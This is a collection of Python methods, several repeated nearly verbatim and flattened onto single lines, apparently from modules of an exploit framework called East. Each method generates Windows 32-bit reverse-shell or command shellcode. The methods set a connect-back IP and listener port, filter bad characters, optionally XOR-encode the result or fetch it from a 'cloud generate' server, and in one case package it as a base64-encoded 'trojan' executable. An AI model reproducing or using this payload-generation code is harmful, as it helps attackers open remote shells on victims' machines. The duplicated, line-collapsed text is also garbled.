def create_shellcode(self): self.log("[] Generate shellcode started") badstring = ["\x00", "\x3B"] ip = self.connectback_ip port = 5555 shellcode_type = 'command' if self.args['listener']: port = int(self.args['listener']['PORT']) shellcode_type = 'reverse' os_target = "WINDOWS" os_arch = '32bit' s = OSShellcodes(os_target, os_arch, ip, port, badstring) # if cloud_generate True we send request to our shell # cloud generate server and recieve generating and base64 encoded # shellcode in create_shellcode shellcode will be decoded and you # recieve normal shell. Cloud shell server ip you can specify in # config.py file in root directory of East framework shellcode = s.create_shellcode( shellcode_type, encode=1, debug=1, cloud_generate=self.cloud_generate ) for i in badstring: if i in shellcode: print("FOUND BAD SYMBOL") return shellcode if shellcode else False
def create_shellcode(self): self.CONNECTBACK_IP = socket.gethostbyname(socket.gethostname()) if self.args['listener']: shellcode_type = 'reverse' port = int(self.args['listener']['PORT']) else: port = 9999 shellcode_type = 'command' self.CONNECTBACK_PORT = port os_system = os_target = 'WINDOWS' os_arch = '32bit' s = OSShellcodes(os_target, os_arch, self.CONNECTBACK_IP, self.CONNECTBACK_PORT) s.TIMESTAMP = 'codesys' shellcode = s.create_shellcode(shellcode_type, encode=0, debug=1) return shellcode
def create_shellcode(self): self.log("Generate shellcode started") port = 4000 if self.args['listener']: port = int(self.args['listener']['PORT']) self.CONNECTBACK_PORT = port os_system = os_target = "WINDOWS" os_arch = '32bit' shellcode_type = 'reverse' s = OSShellcodes(os_target, os_arch, socket.gethostbyname(socket.gethostname()), self.CONNECTBACK_PORT, ["\x00"]) shellcode = s.create_shellcode(shellcode_type, encode='xor', debug=1) self.log("Shellcode type: %s for arch: %s" % (shellcode_type, os_arch)) self.log("Length of shellcode: %d" % len(shellcode)) self.log("Generate shellcode finished") return shellcode
def create_shellcode(self): self.log("Generate shellcode started") port = 4000 if self.args['listener']: port = int(self.args['listener']['PORT']) self.CONNECTBACK_PORT = port os_system = os_target = "WINDOWS" os_arch = '32bit' shellcode_type = 'reverse' s = OSShellcodes(os_target, os_arch, socket.gethostbyname(socket.gethostname()), self.CONNECTBACK_PORT, ["\x00"]) shellcode = s.create_shellcode( shellcode_type, encode='xor', debug=1 ) self.log("Shellcode type: %s for arch: %s" % (shellcode_type, os_arch)) self.log("Length of shellcode: %d" % len(shellcode)) self.log("Generate shellcode finished") return shellcode
def create_shellcode(self): self.log("[] Generate shellcode started") badstring = ["\x00", "\x3b"] self.CONNECTBACK_IP = socket.gethostbyname(socket.gethostname()) port = 5555 if self.args['listener']: port = int(self.args['listener']['PORT']) self.CONNECTBACK_PORT = port os_system = os_target = "WINDOWS" os_arch = '32bit' shellcode_type = 'reverse' s = OSShellcodes(os_target, os_arch, self.CONNECTBACK_IP, self.CONNECTBACK_PORT, badstring) shellcode = s.create_shellcode(shellcode_type, encode=1, debug=1) print(shellcode) self.log("Shellcode type: %s for arch: %s" % (shellcode_type, os_arch)) self.log("Length of shellcode: %d" % len(shellcode)) self.log("[] Generate shellcode finished") return shellcode
def gen_shellcode(self): # print(make_exe) try: sys.path.append("shellcodes") s_o = self.s_o s = OSShellcodes(s_o["os"], s_o["arch"], s_o["ip"], s_o["port"], s_o["badchars"]) trojan = s.create_shellcode(s_o["type"], encode=s_o["encode"], make_exe=s_o["exe"], command=s_o["command"], debug=1, filename="command.exe") except Exception as e: print(e) return False if self.s_o["exe"]: with open(s.get_exe_path()) as f: trojan = f.read() return base64.b64encode(trojan)
def get_sc(self): self.BADCHARS = ["\x00", "\x09", "\x0A", "\x20"] self.log("shell creating...") self.CONNECTBACK_IP = socket.gethostbyname(socket.gethostname()) if self.args['listener']: shellcode_type = 'reverse' port = int(self.args['listener']['PORT']) else: port = 9999 shellcode_type = 'command' self.CONNECTBACK_PORT = port os_system = os_target = 'WINDOWS' os_arch = '32bit' s = OSShellcodes(os_target, os_arch, self.CONNECTBACK_IP, self.CONNECTBACK_PORT, self.BADCHARS) shellcode = s.create_shellcode(shellcode_type, encode=1, debug=0) if shellcode: self.shellcode = shellcode return 1 else: return 0
def create_shellcode(self): self.log("[] Generate shellcode started") badstring = ["\x00", "\x3b"] self.CONNECTBACK_IP = socket.gethostbyname(socket.gethostname()) port = 5555 if self.args['listener']: port = int(self.args['listener']['PORT']) self.CONNECTBACK_PORT = port os_system = os_target = "WINDOWS" os_arch = '32bit' shellcode_type = 'reverse' s = OSShellcodes(os_target, os_arch, self.CONNECTBACK_IP, self.CONNECTBACK_PORT, badstring) shellcode = s.create_shellcode( shellcode_type, encode=1, debug=1 ) print(shellcode) self.log("Shellcode type: %s for arch: %s" % (shellcode_type, os_arch)) self.log("Length of shellcode: %d" % len(shellcode)) self.log("[] Generate shellcode finished") return shellcode
def create_shellcode(self): self.CONNECTBACK_IP = socket.gethostbyname(socket.gethostname()) if self.args['listener']: shellcode_type = 'reverse' port = int(self.args['listener']['PORT']) else: port = 9999 shellcode_type = 'command' self.CONNECTBACK_PORT = port os_system = os_target = 'WINDOWS' os_arch = '32bit' s = OSShellcodes(os_target, os_arch, self.CONNECTBACK_IP, self.CONNECTBACK_PORT) s.TIMESTAMP = 'codesys' shellcode = s.create_shellcode( shellcode_type, encode=0, debug=1 ) return shellcode
def gen_shellcode(self): # print(make_exe) try: sys.path.append("shellcodes") s_o = self.s_o s = OSShellcodes(s_o["os"], s_o["arch"], s_o[ "ip"], s_o["port"], s_o["badchars"]) trojan = s.create_shellcode( s_o["type"], encode=s_o["encode"], make_exe=s_o["exe"], command=s_o["command"], debug=1, filename="command.exe" ) except Exception as e: print(e) return False if self.s_o["exe"]: with open(s.get_exe_path()) as f: trojan = f.read() return base64.b64encode(trojan)